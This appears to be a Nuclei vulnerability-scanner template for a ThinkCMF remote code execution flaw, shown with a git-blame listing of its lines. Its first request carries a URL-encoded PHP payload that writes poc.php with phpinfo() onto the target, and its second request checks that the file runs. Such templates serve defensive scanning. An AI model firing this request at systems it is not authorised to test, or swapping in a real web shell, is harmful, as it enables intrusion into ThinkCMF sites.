nuclei-templates/vulnerabilities/thinkcmf/thinkcmf-rce.yaml

id: thinkcmf-rce

info:
  name: ThinkCMF RCE
  author: pikpikcu
  severity: critical
  reference: https://www.freebuf.com/vuls/217586.html
  tags: thinkcmf,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?a=fetch&content=%3C?php+file_put_contents(%22poc.php%22,%22%3C?php+echo+phpinfo()%3B%22)%3B"
  - method: GET
    path:
      - "{{BaseURL}}/poc.php"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200
Update and rename thinkcmf-shell-write.yaml to thinkcmf-rce.yaml 2021-02-11 17:49:03 +00:00			`id: thinkcmf-rce`
Create thinkcmf-shell-write.yaml 2021-02-11 17:31:25 +00:00
			`info:`
Update and rename thinkcmf-shell-write.yaml to thinkcmf-rce.yaml 2021-02-11 17:49:03 +00:00			`name: ThinkCMF RCE`
Create thinkcmf-shell-write.yaml 2021-02-11 17:31:25 +00:00			`author: pikpikcu`
			`severity: critical`
			`reference: https://www.freebuf.com/vuls/217586.html`
Adding tags to vulnerabilities and workflows 2021-02-12 05:53:01 +00:00			`tags: thinkcmf,rce`
Create thinkcmf-shell-write.yaml 2021-02-11 17:31:25 +00:00
			`requests:`
			`- method: GET`
			`path:`
misc updates 2021-02-11 20:33:38 +00:00			`- "{{BaseURL}}/index.php?a=fetch&content=%3C?php+file_put_contents(%22poc.php%22,%22%3C?php+echo+phpinfo()%3B%22)%3B"`
Create thinkcmf-shell-write.yaml 2021-02-11 17:31:25 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/poc.php"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
misc updates 2021-02-11 20:33:38 +00:00			`- "PHP Extension"`
			`- "PHP Version"`
			`condition: and`
Create thinkcmf-shell-write.yaml 2021-02-11 17:31:25 +00:00
			`- type: status`
			`status:`
			`- 200`